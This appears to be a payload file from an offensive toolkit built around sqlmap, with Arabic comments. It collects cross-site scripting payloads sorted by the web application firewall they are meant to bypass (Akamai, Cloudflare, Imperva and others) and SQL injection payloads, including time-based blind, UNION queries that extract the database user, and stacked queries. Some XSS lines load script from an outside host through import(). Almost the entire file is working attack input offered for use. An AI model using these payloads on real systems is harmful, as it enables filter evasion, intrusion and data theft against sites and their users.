# Aya mixed payloads file (XSS + SQLi WAF-bypass)
# ================================================
# هذا الملف للتجارب اليدوية وتطوير payloads جديدة لتخطي الـ WAF
# - القسم الأول: XSS WAF-bypass payloads (مستوردة من Aya/yoyo + إضافات)
# - القسم الثاني: SQLi WAF-bypass payloads (متوافقة مع AM / am_payloads.xml بشكل عام)
#
# ملاحظة:
# - sqlmap يستخدم am_payloads.xml للـ SQLi عند تفعيل --AM
# - هذا الملف يمكنك استخدامه يدوياً أو من خلال سكربتات مساعدة للتعلم/التطوير

############################
# Section 1: XSS payloads  #
############################

## Akamai WAF XSS payloads (from yoyo/Akamai XSS payloads)
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert\`1\``;

## Cloudflare XSS payloads (from yoyo/Cloudflare xss payloads)
<a"/onclick=(confirm)()>Click Here!
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
1'"><img/src/onerror=.1|alert``>
<img src=x onError=import('//1152848220/')>

## Cloudfront / Imperva / Incapsula / WordFence payloads (مجموعة مختصرة)
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
<x/onclick=globalThis['prompt']()>clickme
<iframe/onload='this["src"]="javas\tcript:al"+"ert``"';>
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6

############################
# Section 2: SQLi payloads #
############################

## Boolean-based generic
AND 1=1
AND 1=2
OR 1=1
OR 1=2

## Boolean-based with comment/space obfuscation
AND/**/1=1
AND/**/1=2
OR/**/1=1
OR/**/1=2
AND%09(1=1)
AND%0A(1=1)

## Time-based blind (MySQL)
AND SLEEP(5)
OR SLEEP(5)
AND IF(1=1,SLEEP(5),0)
AND IF(1=2,SLEEP(5),0)

## Heavy Akamai-style layered IF/SLEEP
AND/**/IF((SELECT 1 FROM dual)=1,IF(1=1,SLEEP(5),0),0)
AND/**/IF(([RANDNUM]=[RANDNUM]),IF([RANDNUM]=[RANDNUM],SLEEP(5),0),0)

## UNION-based generic
UNION ALL SELECT 1,2,3
UNION/**/ALL/**/SELECT/**/1,2,3

## UNION-based with random padding/comments
UNION/**/ALL/**/SELECT/**/NULL,CONCAT('AM:',[RANDSTR]),NULL
UNION/**/ALL/**/SELECT/**/NULL,CONCAT('[AKAMAI]',USER()),NULL

## Stacked queries (حذِر!)
;SELECT SLEEP(5)
;WAITFOR DELAY '0:0:5'


